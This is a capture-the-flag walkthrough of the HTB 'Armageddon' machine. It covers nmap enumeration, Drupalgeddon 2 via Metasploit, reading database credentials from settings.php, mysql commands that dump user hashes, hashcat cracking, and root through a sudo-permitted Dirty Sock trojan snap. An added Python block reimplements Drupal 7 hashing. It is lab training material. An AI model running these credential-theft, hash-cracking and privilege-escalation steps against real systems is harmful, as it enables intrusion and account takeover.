Armageddon

Posted on Jul 27, 2021

HTB - ARMAGEDDON

nmap

# Nmap 7.91 scan initiated Sat Mar 27 16:28:10 2021 as: nmap -sC -sV -oN nmap_open 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up (0.076s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Looking at the changelog (CHANGELOG.txt, one of the paths listed in robots.txt):

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
[...]

The version is 7.56, which is vulnerable to Drupalgeddon 2.

So we use the exploit from Metasploit and get a shell as apache2.

In /var/www/html/sites/default/settings.php we find the credentials for the sql user: drupaluser:CQHEy@9M*m23gBVj.

We can't get an interactive mysql login from this shell, but we can still execute SQL commands from the command line with -e.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "show databases;"

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal;"
mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "show tables from drupal;"
mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "select * from drupal.users;"

uid     name    pass    mail    theme   signature       signature_format        created access  login   status  timezone        language        picture init    data
0                                               NULL    0       0       0       0       NULL            0               NULL
1       brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu                     filtered_html   1606998756      1607077194      1607076276   1Europe/London           0       admin@armageddon.eu     a:1:{s:7:"overlay";i:1;}

Cracking the hash with hashcat (mode 7900 is Drupal7):

hashcat -m 7900 <hashfile> rockyou.txt

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Drupal7
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Time.Started.....: Sat Mar 27 22:56:39 2021 (4 secs)
Time.Estimated...: Sat Mar 27 22:56:43 2021 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    39480 H/s (7.61ms) @ Accel:4 Loops:64 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 155648/14344384 (1.09%)
Rejected.........: 0/155648 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:32704-32768
Candidates.#1....: 123456 -> shelbourne
Hardware.Mon.#1..: Temp: 63c Fan: 30% Util: 99% Core:1950MHz Mem:6800MHz Bus:16

Started: Sat Mar 27 22:56:21 2021
Stopped: Sat Mar 27 22:56:44 2021
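For reference, here is what that $S$ hash encodes, as an added example that is not part of the original post: a Python reimplementation of Drupal 7's password check (the algorithm in its password.inc), which exposes the salt and the 2^15 SHA-512 rounds behind hashcat's Iteration:32704-32768 line, and makes clear that the work factor did nothing for a password that is a rockyou word.

```python
import hashlib
import hmac

# Drupal 7's phpass-style alphabet (password.inc); stored hashes are 55 chars.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Hash from the users table dump above; hashcat recovered "booboo" for it.
HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"

def _b64(data: bytes) -> str:
    """Drupal's _password_base64_encode: 3 bytes -> 4 chars, low bits first."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_setting(stored: str) -> dict:
    """Setting = first 12 chars: '$S$', one work-factor char, 8-char salt."""
    if not stored.startswith("$S$") or len(stored) < 12:
        raise ValueError("not a Drupal 7 SHA-512 hash")
    log2 = ITOA64.index(stored[3])
    if not 7 <= log2 <= 30:  # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        raise ValueError("work factor out of range")
    return {"count_log2": log2, "iterations": 1 << log2, "salt": stored[4:12]}

def drupal7_hash(password: str, stored: str) -> str:
    """Recompute the stored form of password with the salt and work factor of stored."""
    p, pw = parse_setting(stored), password.encode()
    h = hashlib.sha512(p["salt"].encode() + pw).digest()
    for _ in range(p["iterations"]):  # do { } while (--count) in password.inc
        h = hashlib.sha512(h + pw).digest()
    return (stored[:12] + _b64(h))[:55]  # DRUPAL_HASH_LENGTH

def drupal7_check(password: str, stored: str) -> bool:
    """Constant-time comparison against the stored hash."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)
```

parse_setting(HASH) reports count_log2 15, i.e. Drupal 7's default 32768 rounds, so the 4-second crack came from the wordlist, not from a weak configuration.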

We use the creds to SSH in as brucetherealadmin.

Running sudo -l shows the path to root: the user can run snap install as root without a password.

[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

We want to install a malicious package.

There is a vulnerability involving snap called [Dirty Sock](https://0xdf.gitlab.io/2019/02/13/playing-with-dirty-sock.html).

What we are interested in is the TROJAN_SNAP payload from that writeup.


We decode that and add it to dirty.snap.

Then we try to install it:

[brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install new.snap
error: cannot find signatures with metadata for snap "new.snap"

Try again with --dangerous:

[brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install new.snap --dangerous
error: snap "new.snap" requires devmode or confinement override

Finally it installs when we also add --devmode:

[brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install --dangerous --devmode new.snap
dirty-sock 0.1 installed

Now we can switch to the user dirty_sock and run sudo bash -p to get root.txt.